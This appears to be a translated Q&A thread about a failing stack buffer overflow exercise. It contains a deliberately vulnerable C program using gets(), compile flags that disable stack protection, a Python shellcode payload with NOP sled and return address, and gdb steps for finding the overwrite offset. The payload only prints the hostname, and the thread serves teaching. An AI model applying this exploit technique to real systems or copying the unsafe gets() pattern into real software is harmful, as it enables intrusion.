无法运行堆栈缓冲区溢出漏洞攻击

Question

我必须在下面的缓冲区溢出程序中注入一段代码。代码应打印主机名。我有一个可以工作的操作码(\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80)。我已经使用了NOPs和重复的回信地址。但是我不能用它来运行代码，并且我总是以分段错误结束。有人能在这方面帮我吗？

Vulnerable.c

#include <stdio.h>
#include <stdlib.h>

int
main(int argc, char * * argv)
{
  char * stuff = 0;
  int len = 0;
  vulnerable();
  return 0;
}

int
vulnerable(void)
{
  char buf[100];
  printf("enter your name: ");
  fflush(stdout);
  gets(buf);
  printf("\"%s\"\n Welcome", buf );
}

我用以下命令编译了上述程序

gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Shellcode.py

print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2‌​f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6 

我在命令行中调用了这个python程序。

python shellcode.py | ./vulnerable

Answer 1

我建议你打开核心转储：

ulimit -c unlimited

然后执行一个简单的缓冲区溢出，比如perl -e 'print "A"x130'，系统将生成转储:使用gdb -c core打开它，您将看到%eip=0x41414141

然后，你可以像perl -e 'print "A"x120'一样减少注入的缓冲区，直到你得到准确的缓冲区大小，以便重写RET。

Answer 2

你能描述一下找出回邮地址的步骤吗？

c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode

Breakpoint 1, vulnerable () at vulnerable.c:17
17        printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
 eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
 called by frame at 0xbffff7cc
 source language c.
 Arglist at 0xbffff7bc, args: 
 Locals at 0xbffff7bc, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0xbffff7bc, eip at 0xbffff7c0

该示例显示了将返回地址eip 0x80484c9保存为at 0xbffff7c0。